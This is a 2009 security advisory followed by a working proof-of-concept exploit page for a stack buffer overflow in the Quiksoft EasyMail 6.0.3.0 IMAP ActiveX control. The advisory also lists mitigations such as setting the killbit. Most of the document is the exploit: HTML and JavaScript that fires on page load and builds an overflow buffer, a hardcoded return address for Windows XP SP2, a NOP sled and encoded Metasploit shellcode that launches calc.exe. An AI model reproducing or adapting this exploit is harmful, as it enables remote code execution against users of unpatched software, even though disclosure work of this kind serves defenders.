<!--

I - TITLE

Security advisory: Quiksoft EasyMail 6.0.3.0 imap connect() ActiveX stack overflow exploit

II - SUMMARY

Description: Remotely exploitable buffer overflow in ActiveX component
Quiksoft EasyMail 6.0.3.0 allows for the arbitrary code execution in the
user context.

Author: Sebastian Wolfgarten (sebastian at wolfgarten dot com),
http://www.devtarget.org

Date: September 17th, 2009

Severity: Medium (remote code execution in the user context)

References: http://www.devtarget.org/easymail-advisory-09-2009.txt

III - OVERVIEW

Quote from quiksoft.com: "The EasyMail Products are relied upon by over thousands
of international corporations, federal, state and local organizations, and individual
developers. Quiksoft has established the EasyMail products as "the professional,
reliable, and easy to use choice for e-mail development". More information about
the product can be found online at http://www.quiksoft.com.

IV - DETAILS

The software Quiksoft EasyMail 6.0.3.0 ships emimap4.dll, an ActiveX component
to facilitate the development of IMAP4-aware applications. The connect() function
of this component is prone to a classic buffer overflow vulnerability when a
particularly long argument is passed and the application attempts to copy that
data into a finite buffer. This allows for the execution of arbitrary code in the
user context.

V - MITIGATING MEASURES

Either set the killbit for the relevant ActiveX component (clsid:0CEA3FB1-7F88-4803-AA8E-AD021566955D)
or install the latest version of Quiksoft EasyMail which is not considered vulnerable.

VI - NOTES

Code below was taken from an exploit originally written by e.b
(see http://www.milw0rm.com/exploits/4825). Thanks also to Francis Provencher
for drawing my attention on Quiksoft EasyMail. Shellcode below is rather harmless and
executes calc.exe.

Tested on Windows XP SP2 English, IE6, emimap4.dll version 6.0.3.0

-->

<html>
<head>
 <title>Quiksoft EasyMail 6.0.3.0 imap connect() stack overflow</title>
 <script language="JavaScript" defer>
   function Check() {
        var buf = 'A';
    while (buf.length <= 440) buf = buf + 'A';


// win32_exec -  EXITFUNC=seh CMD=c:\windows\system32\calc.exe Size=378 Encoder=Alpha2 http://metasploit.com
var shellcode1 = unescape("%eb%03%59%eb%05%e8%f8%ff%ff%ff%49%49%49%49%49%49" +
                         "%48%49%49%49%49%49%49%49%49%49%49%49%51%5a%6a%43" +
                         "%58%30%42%31%50%42%41%6b%42%41%53%42%32%42%41%32" +
                         "%41%41%30%41%41%58%50%38%42%42%75%48%69%6b%4c%4d" +
                         "%38%63%74%75%50%33%30%67%70%4c%4b%73%75%57%4c%6e" +
                         "%6b%63%4c%45%55%63%48%33%31%58%6f%6c%4b%70%4f%77" +
                         "%68%6e%6b%73%6f%71%30%65%51%6a%4b%72%69%4e%6b%36" +
                         "%54%4e%6b%45%51%4a%4e%46%51%6b%70%4f%69%4c%6c%6e" +
                         "%64%59%50%73%44%53%37%58%41%7a%6a%54%4d%33%31%78" +
                         "%42%48%6b%7a%54%77%4b%52%74%66%44%34%44%62%55%59" +
                         "%75%6e%6b%41%4f%36%44%45%51%6a%4b%53%56%4c%4b%46" +
                         "%6c%72%6b%4c%4b%53%6f%37%6c%63%31%6a%4b%4e%6b%75" +
                         "%4c%6c%4b%54%41%48%6b%4d%59%51%4c%51%34%34%44%4a" +
                         "%63%30%31%6f%30%62%44%4e%6b%71%50%54%70%4b%35%6b" +
                         "%70%50%78%46%6c%6c%4b%63%70%44%4c%4c%4b%44%30%35" +
                         "%4c%6e%4d%6c%4b%61%78%55%58%6a%4b%64%49%4e%6b%6b" +
                         "%30%6c%70%57%70%57%70%47%70%4c%4b%70%68%47%4c%71" +
                         "%4f%44%71%6b%46%33%50%66%36%4f%79%4c%38%6e%63%4f" +
                         "%30%71%6b%30%50%41%78%58%70%6c%4a%53%34%51%4f%33" +
                         "%58%4e%78%39%6e%6d%5a%46%6e%61%47%4b%4f%69%77%63" +
                         "%53%45%6a%33%6c%72%57%30%69%50%6e%62%44%70%6f%73" +
                         "%47%41%63%41%4c%50%73%42%59%31%63%50%74%65%35%70" +
                         "%6d%54%73%65%62%33%6c%30%63%41%71%70%6c%53%53%66" +
                         "%4e%31%75%74%38%70%65%77%70%43");

       var eip = unescape("%0F%DD%17%7D"); // Windows XP SP2 English
          var nop = unescape("%90%90%90%90%90%90%90%90%90%90%90%90");

       var m = buf + eip + nop + shellcode1 + nop;
              obj.connect(m);
  }
    </script>
 </head>
<body onload="JavaScript: return Check();">
   <object id="obj" classid="clsid:0CEA3FB1-7F88-4803-AA8E-AD021566955D">
    Failed to instantiate object.
   </object>
</body>
</html>

# milw0rm.com [2009-09-17]
